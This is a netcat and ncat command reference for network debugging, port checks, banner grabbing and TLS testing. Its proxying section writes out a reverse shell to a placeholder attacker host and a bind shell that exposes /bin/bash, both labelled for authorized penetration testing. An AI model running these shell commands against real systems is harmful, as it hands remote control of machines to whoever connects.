CertTools Logo
CertTools

netcat (nc) Commands

Network debugging and testing tool for port connectivity, banner grabbing, and TLS connection testing

Basic Connection Testing

Test TCP connection to port

nc -zv example.com 443

Check if port 443 is open. -z scans without sending data, -v verbose output. Quick port availability check.

Test port range

nc -zv example.com 80-443

Scan range of ports to find open services. Shows which ports accept connections.

Connect to HTTP port

nc example.com 80

Open interactive connection to HTTP port. Type commands manually to interact with server.

Test with timeout

nc -w 5 -zv example.com 443

Set 5-second timeout for connection attempt. Prevents hanging on unresponsive hosts.

Banner Grabbing and Service Detection

Grab HTTP server banner

echo -e "HEAD / HTTP/1.0\r\n\r\n" | nc example.com 80

Send HTTP HEAD request to identify web server version and headers. Useful for fingerprinting.

Test SMTP server

nc example.com 25

Connect to SMTP and see server banner. Type EHLO example.com to see supported features.

Check FTP server

nc example.com 21

View FTP server banner and version. Identify FTP server software.

Test SSH server

nc example.com 22

Get SSH protocol version and server identification. Shows SSH-2.0-OpenSSH_x.x format.

HTTPS and TLS Testing

Test HTTPS port availability

nc -zv example.com 443

Verify HTTPS port is listening. Does not perform TLS handshake, just TCP connection.

TLS connection with ncat

ncat --ssl example.com 443

Connect to HTTPS port with TLS encryption using ncat (part of nmap). Interactive TLS session.

TLS banner grabbing with certificate verification

ncat --ssl --ssl-verify example.com 443

Connect with TLS and verify server certificate. Fails if certificate is invalid or untrusted.

STARTTLS for SMTP

# Connect, then send STARTTLS command
ncat --ssl example.com 587
# Type: EHLO example.com
# Then: STARTTLS

Test STARTTLS upgrade on mail servers. Initial connection is plaintext, then upgraded to TLS.

Test TLS connection with openssl

echo | openssl s_client -connect example.com:443 2>&1 | head -20

Use openssl s_client instead of nc for TLS. Shows certificate and connection details.

Test alternative HTTPS ports

nc -zv example.com 8443

Check non-standard HTTPS ports (8443, 8080, etc). Useful for testing alternative configurations.

File Transfer and Data Transmission

Send file to remote host

# Receiver (listening)
nc -l 9999 > received_file.txt

# Sender
nc remote_host 9999 < file_to_send.txt

Simple file transfer without encryption. Receiver listens, sender connects and transmits.

Create simple chat

# Host A
nc -l 9999

# Host B
nc host_a 9999

Bidirectional communication. Type messages on either side. Useful for testing connectivity.

Stream data from command

tar czf - /path/to/dir | nc remote_host 9999

Pipe command output through netcat. Combine with tar for directory transfers.

Port Listening and Server Simulation

Listen on specific port

nc -l 9999

Start listening server on port 9999. Accepts connections and displays received data.

Listen and keep alive (multiple connections)

nc -lk 9999

Keep listening after client disconnects. -k flag allows multiple connections.

Listen on specific interface

nc -l -s 192.168.1.10 9999

Bind listener to specific IP address. Useful on multi-homed hosts.

Serve HTTP response

while true; do
  echo -e "HTTP/1.1 200 OK\r\n\r\nHello World" | nc -l 8080
done

Simple HTTP server for testing. Returns basic HTTP response to browser requests.

UDP Mode

Test UDP port

nc -uv example.com 53

Connect using UDP instead of TCP. Test DNS or other UDP services.

Listen on UDP port

nc -ul 9999

UDP listener. Receive UDP packets on specified port.

Send UDP packet

echo "test" | nc -u example.com 9999

Send single UDP datagram. Useful for testing UDP services.

Port Forwarding and Proxying

Simple port forwarding

# Forward local port 8080 to remote service
ncat -l 8080 -c "ncat remote_host 80"

Forward connections from local port to remote service. Acts as simple TCP proxy.

Reverse shell (authorized penetration testing only)

# Listener on attacker machine
nc -lvnp 4444

# Target machine (authorized testing only)
nc attacker_ip 4444 -e /bin/bash

Reverse shell for authorized penetration testing. Target connects to listener, providing shell access.

Bind shell (authorized testing only)

# Target machine (authorized testing only)
nc -lvnp 4444 -e /bin/bash

# Attacker machine
nc target_ip 4444

Bind shell for authorized security testing. Target listens and provides shell to connecting client.

HTTP proxy with ncat

ncat -l 8080 --proxy-type http

Create simple HTTP proxy. Useful for testing web traffic routing and connectivity.

SSL/TLS proxy

# Accept SSL connections and forward to plaintext backend
ncat -l 443 --ssl --ssl-cert cert.pem --ssl-key key.pem -c "ncat backend_host 80"

SSL/TLS termination proxy. Accept encrypted connections and forward to unencrypted backend.

Netcat Variants and Differences

Traditional netcat (nc)

# Check which variant you have
nc -h 2>&1 | head -1

Original netcat implementation. Simple, widely available, but lacks modern features like SSL support.

GNU netcat

# GNU netcat features
nc --version
# Supports -e flag for command execution

GNU implementation with additional features. Includes -e flag for executing commands on connection.

OpenBSD netcat (nc)

# OpenBSD nc is default on macOS and FreeBSD
# No -e flag for security, different option syntax

Security-focused BSD implementation. Removes dangerous -e flag, preferred on many systems.

ncat (nmap netcat)

# ncat is part of nmap project
ncat --version
# Features: SSL/TLS, proxying, broker mode, access control

Modern netcat replacement with SSL/TLS support, proxying, and advanced features. Recommended for TLS testing.

Feature comparison

# SSL/TLS support
Traditional nc: No
GNU netcat: No
OpenBSD nc: No
ncat: Yes (--ssl flag)

# Command execution (-e flag)
Traditional nc: Yes
GNU netcat: Yes
OpenBSD nc: No (security)
ncat: Yes (--exec or -c)

Key differences between netcat implementations. Use ncat for TLS, OpenBSD nc for security.

Practical Examples

Test if server accepts HTTPS connections

nc -zv -w 3 example.com 443 && echo "Port 443 is open" || echo "Port 443 is closed"

Quick connectivity check before attempting SSL/TLS connection.

Test firewall rules

# From inside firewall
nc -l 9999

# From outside firewall
nc -zv external_ip 9999

Verify port forwarding and firewall rules. Check if external port is accessible.

Check multiple certificate-related ports

for port in 80 443 8080 8443; do
  echo "Testing port $port..."
  nc -zv -w 2 example.com $port
done

Scan common HTTP/HTTPS ports to find active web services.

Debug ACME HTTP-01 challenge

echo -e "GET /.well-known/acme-challenge/test HTTP/1.0\r\nHost: example.com\r\n\r\n" | nc example.com 80

Test Let's Encrypt HTTP-01 challenge availability. Verify web server serves .well-known directory.

See Also

tcpdump Commands
Packet capture and analysis
nmap Commands
Port scanning and service detection
traceroute Commands
Network path analysis

Important Notes

No Built-in TLS Support

netcat doesn't support TLS/SSL natively. Use openssl s_client for HTTPS testing or ncat (nmap's netcat) which includes SSL support.

Version Differences

Different netcat implementations exist (BSD nc, GNU nc, ncat). Options may vary. Check man nc for your version.

Security Warning

Data transmitted via netcat is unencrypted. Don't send sensitive information without additional encryption layer.

Firewall Restrictions

Many firewalls block netcat's default behavior. May need appropriate firewall rules for listening mode.

Alternative: ncat

Consider using ncat (part of nmap) for SSL/TLS support, proxy capabilities, and additional features: ncat --ssl example.com 443

Port Permissions

Listening on ports below 1024 requires root/administrator privileges. Use higher ports for testing.